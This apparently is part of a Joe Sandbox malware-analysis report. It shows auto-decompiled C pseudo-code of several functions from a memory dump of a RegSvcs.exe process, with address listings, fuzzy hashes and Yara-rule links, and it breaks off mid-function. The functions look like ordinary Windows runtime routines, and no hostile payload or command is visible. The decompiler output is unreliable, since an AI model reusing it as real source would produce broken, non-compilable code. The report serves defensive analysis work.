Function 010369A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E010369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x10ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00FC6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01036BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00FF9980() >= 0) {
							E00FD2280(_t56, 0x10a8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x10a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x10a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00FBB6F0(0xf9c338, 0xf9c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00FF9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00FF95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00FCFFB0(_t68, _t77, 0x10a8778);
				}
				_pop(_t78);
				return E00FFB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x010369b5
0x010369be
0x010369c3
0x010369c9
0x010369cc
0x010369d1
0x010369d3
0x010369de
0x010369e1
0x010369ea
0x010369f6
0x010369fe
0x01036a13
0x01036a14
0x01036a15
0x01036a16
0x01036a1e
0x01036a26
0x01036a31
0x01036a36
0x01036a37
0x01036a40
0x01036a49
0x01036a4a
0x01036a53
0x01036a59
0x01036a5d
0x01036a5e
0x01036a64
0x01036a67
0x01036a6a
0x01036a6d
0x01036a70
0x01036a77
0x01036a7d
0x01036a86
0x01036a89
0x01036a9c
0x01036a9f
0x01036aa2
0x01036aa5
0x01036aaf
0x01036ab1
0x01036ab8
0x01036ab9
0x01036abb
0x01036abe
0x01036ac5
0x01036ac5
0x01036aaf
0x01036a40
0x01036a26
0x010369fe
0x01036ace
0x01036ad0
0x01036ad3
0x01036ad8
0x01036adf
0x01036adf
0x01036ae8
0x01036aef
0x01036aef
0x01036af9
0x01036b06

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5080dc3b9b20656425b511885271085272a35169bbd2c5550c789622a3b719ed
Instruction ID: 13df95b1bbfecfd05d85e8f8ba31a6b82115b452af345130477b5e5528cde220
Opcode Fuzzy Hash: 5080dc3b9b20656425b511885271085272a35169bbd2c5550c789622a3b719ed
Instruction Fuzzy Hash: D4418AB1D00608AFDB24CFA9C941BFEBBF8EF48304F04816AE954A7251DB759906DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FB5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00FB52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00FF95D0();
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00FCEB70(_t54, 0x10a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00FF95D0();
								L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00FCEB70(_t54, 0x10a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00FFF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00FCEB70(_t54, 0x10a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00FF95D0();
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x00fb5220
0x00fb5224
0x01010d13
0x01010d16
0x01010d19
0x00fb522a
0x00fb522a
0x00fb522d
0x00fb522d
0x00fb5231
0x00fb5235
0x00fb5239
0x01010d5c
0x01010d62
0x00000000
0x00000000
0x01010d6a
0x01010d7b
0x01010d7f
0x01010d81
0x01010d84
0x01010d95
0x01010d95
0x01010d6c
0x01010d71
0x01010d71
0x01010d9a
0x00000000
0x00fb524a
0x00fb524a
0x00fb5250
0x01010d24
0x01010d35
0x01010d39
0x01010d3b
0x01010d3e
0x01010d50
0x01010d50
0x01010d26
0x01010d2b
0x01010d2b
0x00000000
0x01010d55
0x00fb5256
0x00fb525b
0x00fb5265
0x01010da7
0x00fb526b
0x00fb526e
0x00fb5272
0x01010db1
0x01010db4
0x01010dc5
0x01010dc5
0x00fb5272
0x00fb5278
0x00fb527e
0x00fb528a
0x00fb528c
0x00fb528d
0x00000000
0x00fb5280
0x00fb5282
0x00fb5288
0x00fb529f
0x00fb5292
0x00000000
0x00fb5292
0x00000000
0x00fb5288
0x00fb527e

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ee91a5176088ee1c85c0059cc6148fca896fcd4add0aeb88c445b743864f92
Instruction ID: f23056b5315e34a322ebe07e1f5b3b1160d02886cc73f5e6bd489b090da0d93a
Opcode Fuzzy Hash: a3ee91a5176088ee1c85c0059cc6148fca896fcd4add0aeb88c445b743864f92
Instruction Fuzzy Hash: AD312A32245A00DBC722BB19CC42F7A77A5FF00B60F55462AF5954B1A9E778EC40EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FF3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00FC7B60(0, _t61, 0xf911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00FC7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0xff08b58b
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00FD4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x00ff3d4c
0x00ff3d50
0x00ff3d55
0x00ff3d5e
0x0102e79a
0x00000000
0x0102e79a
0x00ff3d68
0x0102e789
0x00ff3d9d
0x00ff3da3
0x00ff3daf
0x00ff3db5
0x00ff3dbc
0x00ff3dc4
0x00ff3dc9
0x00ff3dce
0x0102e7ae
0x0102e7ae
0x00ff3dd9
0x00ff3dde
0x00ff3de2
0x00ff3de7
0x00ff3e0d
0x00ff3e13
0x00ff3e16
0x00ff3e1e
0x00ff3e25
0x00ff3e28
0x00000000
0x00000000
0x00ff3e2a
0x00ff3e2f
0x00ff3e37
0x00ff3e37
0x00000000
0x00ff3e37
0x00ff3e31
0x00000000
0x00ff3e31
0x00ff3e20
0x00ff3e20
0x00ff3e35
0x00000000
0x00ff3de9
0x00ff3de9
0x00ff3de9
0x00ff3dee
0x00ff3dfd
0x00ff3dff
0x00ff3e02
0x00ff3e05
0x00ff3e05
0x00000000
0x00ff3df0
0x00ff3de7
0x0102e78f
0x0102e794
0x00ff3d79
0x00ff3d84
0x00ff3d89
0x00ff3d8e
0x00000000
0x0102e7a4
0x00ff3d96
0x00ff3d9a
0x00000000
0x00ff3d9a
0x00000000
0x0102e794
0x00ff3d6e
0x00ff3d73
0x00000000
0x0102e7b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6764113bc90b4b962878e328ce8fda010b88c6701d12ef247aab02516c4222a
Instruction ID: 1a97a9dc0fe614ae68406add6fa8b3a9c957227eb979abc5095752048ee43bff
Opcode Fuzzy Hash: f6764113bc90b4b962878e328ce8fda010b88c6701d12ef247aab02516c4222a
Instruction Fuzzy Hash: 8031AD32A05629DBC7298F29C842A7FBBE5EF85710B15806EEA45CB360E630D940E790

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FEA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1090220);
				E0100D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x10a7b9c; // 0x0
				_t55 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0100D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x10a7b10 =  *0x10a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x10a536c; // 0x77995368
					if( *_t51 != 0x10a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x10a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x10a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00FEA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x00fea61c
0x00fea61e
0x00fea623
0x00fea628
0x00fea62b
0x00fea62d
0x00fea648
0x00fea64a
0x00fea64f
0x01029b44
0x00fea6ec
0x00fea6f1
0x00fea6f1
0x00fea655
0x00fea657
0x00fea65a
0x00fea65d
0x00fea662
0x00fea663
0x00fea667
0x00fea668
0x00fea66d
0x00fea706
0x00fea706
0x01029bda
0x01029be6
0x01029beb
0x00000000
0x01029beb
0x00fea679
0x01029b7a
0x00000000
0x01029b7a
0x00fea683
0x00fea6f4
0x00fea6f7
0x00fea6f9
0x00fea6fd
0x00fea6a0
0x00fea6a0
0x00fea6ad
0x00fea6af
0x00fea6b4
0x01029ba7
0x01029bac
0x00000000
0x00000000
0x01029bc6
0x01029bce
0x01029bd1
0x01029bd3
0x01029bd3
0x00000000
0x01029bd1
0x00fea6bd
0x00fea6c3
0x00fea6c6
0x00fea6d2
0x00fea701
0x00fea704
0x00000000
0x00fea704
0x00fea6d4
0x00fea6d6
0x00fea6d9
0x00fea6db
0x00fea6e1
0x00fea6e6
0x00fea6e8
0x00fea6e8
0x00fea6ea
0x00000000
0x00fea6ea
0x00fea688
0x00fea692
0x00fea694
0x00fea699
0x00000000
0x00000000
0x00fea69d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09633f47965c90b805aa8867afe542afc735905630e976b2b3b5babd0d7ec9b3
Instruction ID: 2a8047dbda3300ed3a8d961f3ea5fdc13216bb776f2fc328da9b1796bc1ce99e
Opcode Fuzzy Hash: 09633f47965c90b805aa8867afe542afc735905630e976b2b3b5babd0d7ec9b3
Instruction Fuzzy Hash: C1419AB5A00255DFCB15CF99C890B99BBF2BB49314F18C0A9E944AB345C779AD01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01037016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01037016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x10ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01036B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01036B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00FD7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00FF9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00FFB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00FD4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01037016
0x0103701e
0x0103702b
0x01037033
0x01037037
0x0103703c
0x0103703e
0x01037041
0x01037045
0x0103704a
0x01037050
0x01037055
0x0103705a
0x01037062
0x01037062
0x0103705a
0x01037064
0x01037064
0x01037067
0x01037071
0x01037096
0x0103709b
0x010370a2
0x010370a6
0x010370a7
0x010370ad
0x010370b3
0x010370b6
0x010370bb
0x010370c3
0x010370c3
0x010370c6
0x010370cd
0x010370dd
0x010370e0
0x010370e2
0x010370e2
0x010370ee
0x01037101
0x010370f0
0x010370f9
0x010370f9
0x0103710a
0x0103710e
0x01037112
0x01037117
0x01037118
0x01037118
0x010370bb
0x0103711d
0x01037123
0x01037131
0x01037131
0x01037136
0x0103713d
0x0103713e
0x0103713f
0x0103714a
0x0103714a
0x01037084
0x01037088
0x00000000
0x0103708e
0x0103708e
0x01037092
0x00000000
0x01037092

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706f5a6dc2c689ce8fa8e723af93380bb46bae510037a54abb913ad2a9bd7588
Instruction ID: ccb0d3e5da6e8ccd5548358f37b6ac6a210249e6c6bb0665efd9cd3ff90f8db0
Opcode Fuzzy Hash: 706f5a6dc2c689ce8fa8e723af93380bb46bae510037a54abb913ad2a9bd7588
Instruction Fuzzy Hash: 5931E4B26047419BC321DF2CCC41A6AB7EAFFC8700F044A69F99587791E734E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FDC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FDC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00FD7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01088D34(_v8, _t80);
					}
					E00FD2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00FCFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01088833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00FCFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00FFB180();
						if(_a4 != 0) {
							E00FD2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00FDBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00FDBB2D(_t16, _t15);
						E00FDB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00FCFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00FCFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00FCFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x00fdc18d
0x00fdc18f
0x00fdc191
0x00fdc19b
0x00fdc1a0
0x00fdc1d4
0x00fdc1de
0x01022d6e
0x00fdc1e4
0x00fdc1e4
0x00fdc1e4
0x00fdc1ec
0x01022d7d
0x01022d7d
0x00fdc1f3
0x00fdc1ff
0x01022d88
0x01022d8d
0x01022d94
0x01022d94
0x01022d9f
0x01022da4
0x01022dab
0x01022db0
0x01022db2
0x01022db3
0x01022db4
0x01022dbc
0x01022dc3
0x01022dc3
0x00fdc205
0x00fdc205
0x00fdc208
0x00fdc20e
0x00fdc211
0x00fdc216
0x00fdc219
0x00fdc21f
0x00fdc222
0x00fdc22c
0x00fdc234
0x00fdc23a
0x00fdc23f
0x00fdc245
0x00fdc24b
0x00fdc251
0x00fdc25a
0x00fdc276
0x00fdc27d
0x00fdc27d
0x00fdc25c
0x00fdc25c
0x00000000
0x00fdc25e
0x00fdc1a4
0x00fdc1aa
0x00fdc1b3
0x00fdc265
0x00fdc26c
0x00fdc26c
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: b1d646884981b43cab7246783811188ac6775194f0e21dfafaa023202bb19e44
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: AA310672A01557AED705EBB4C881BE9F756BF42304F18416FE41847302DB386A4AF7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE53C5 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FE53C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t56;
				unsigned int _t58;
				char _t63;
				unsigned int _t72;
				signed int _t77;
				intOrPtr _t79;
				void* _t80;

				_push(0x18);
				_push(0x108ff80);
				E0100D08C(__ebx, __edi, __esi);
				_t79 = __ecx;
				 *((intOrPtr*)(_t80 - 0x28)) = __ecx;
				 *((char*)(_t80 - 0x1a)) = 0;
				 *((char*)(_t80 - 0x19)) = 0;
				 *((intOrPtr*)(_t80 - 0x20)) = 0;
				 *((intOrPtr*)(_t80 - 4)) = 0;
				if(( *(__ecx + 0x40) & 0x75010f61) != 0 || ( *(__ecx + 0x40) & 0x00000002) == 0 || ( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
					_t47 = 0;
					_t63 = 1;
				} else {
					_t63 = 1;
					_t47 = 1;
				}
				if(_t47 == 0) {
					_t77 = 0xc000000d;
					goto L18;
				} else {
					E00FCEEF0( *((intOrPtr*)(_t79 + 0xc8)));
					 *((char*)(_t80 - 0x19)) = _t63;
					if( *((char*)(_t79 + 0xda)) == 2) {
						_t47 =  *(_t79 + 0xd4);
					} else {
						_t47 = 0;
					}
					if(_t47 != 0) {
						_t77 = 0;
						goto L18;
					} else {
